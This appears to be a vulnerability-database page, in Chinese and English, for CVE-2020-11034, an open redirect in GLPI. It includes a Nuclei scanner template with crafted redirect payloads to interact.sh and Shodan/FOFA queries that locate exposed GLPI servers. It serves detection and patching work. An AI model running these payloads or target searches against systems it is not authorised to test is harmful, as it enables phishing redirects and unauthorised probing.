CVE-2020-11034: GLPI <9.4.6 - Open Redirect

日期: 2025-08-01 | 影响软件: GLPI | POC: 已公开

漏洞描述

GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.

PoC代码[已公开]

id: CVE-2020-11034

info:
  name: GLPI <9.4.6 - Open Redirect
  author: pikpikcu
  severity: medium
  description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.
  remediation: Upgrade to version 9.4.6 or later.
  reference:
    - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
    - https://github.com/glpi-project/glpi/archive/9.4.6.zip
    - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5WQMONZRWLWOXMHMYWR7A5Q5JJERPMVC/
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q4BG2UTINBVV7MTJRXKBQ26GV2UINA6L/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-11034
    cwe-id: CWE-601,CWE-185
    epss-score: 0.42861
    epss-percentile: 0.97404
    cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: glpi-project
    product: glpi
    shodan-query:
      - http.title:"glpi"
      - http.favicon.hash:"-1474875778"
    fofa-query:
      - icon_hash="-1474875778"
      - title="glpi"
    google-query: intitle:"glpi"
  tags: cve,cve2020,redirect,glpi,glpi-project

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
      - '{{BaseURL}}/index.php?redirect=//interact.sh'

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# digest: 4b0a00483046022100a4ace293146f8e3a06255e4a357f8538c71c9a192626f898cc4f11f21d76d27c0221008212b5a10977d597c2d059d7f6866b4428c9f9af2bb8430987c9bc704b226369:922c64590222798bb761d5b6d8e72950

相关漏洞推荐